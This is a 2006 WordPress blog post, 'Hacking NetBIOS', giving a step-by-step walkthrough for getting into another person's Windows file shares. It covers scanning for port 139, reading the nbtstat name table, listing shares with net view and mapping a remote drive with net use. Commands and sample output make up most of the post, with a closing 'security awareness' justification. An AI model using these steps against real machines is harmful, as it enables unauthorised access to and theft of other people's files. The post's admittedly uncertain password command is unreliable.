To Be or Not To Be!!!

Just another Wordpress.com weblog

Hacking NetBIOS

NetBIOS stands for Network basic input output system and is used in Windows for its file and printer sharing.
1. NetBIOS
To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:

25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn

If your results look like that then you're set…

2. nbtstat
To get the info you need for the attack we use a program called nbtstat:
Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.
code:

c:\>nbtstat -A 127.0.0.1

Use -A if you're using IP addresses. If you're going to use hostnames use -a.
This will give you what is called a nametable:
code:

Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ———————————————
    computername      <00>  UNIQUE      Registered
    workgroupname     <00>  GROUP       Registered
    computername      <20>  UNIQUE      Registered
    workgroupname     <1E>  GROUP       Registered
    workgroupname     <1D>  UNIQUE      Registered
    ..__MSBROWSE__.   <01>  GROUP       Registered

    MAC Address = xx-xx-xx-xx-xx-xx       

This is a friend's nametable (names and workgroups have been edited to save him from "black minds") ;-) 
Now, the line
code:

computername      <20>  UNIQUE      Registered

is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress
code:

C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name  Type  Used as  Comment

———————————–
SharedDocs  Disk
The command completed successfully.

That's the result you should get (it wil be different on a non-WinXP box ).

Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
net use letter: \\ipaddress\name
code:

c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.

Now their harddrive is "mirrored" to the drive letter we specifided (so make sure its not a drive that exists on your computer). Now just browse it as you would a local drive:
code:

c:\>cd g:
g:\>

In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:
code:

c:\>net use /delete g:
g: was deleted successfully.

Some systems may be locked with passwords (win2k, WinNT):
If you know the password, you would use this command:
code:

net use password \\ip\sharename

(not sure about that one…)
Now, many people will be saying "this is a security site, why are you telling us this?". The reason is simple: I'm showing you how easy it is for your windows machine to be hacked withough proper protection… Moral of this story: always cover port 139.

BLACK ANGEL

Tháng Sáu 19, 2006 - Posted by | Security Exploits

Chưa có phản hồi.

Gửi phản hồi

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s

%d bloggers like this: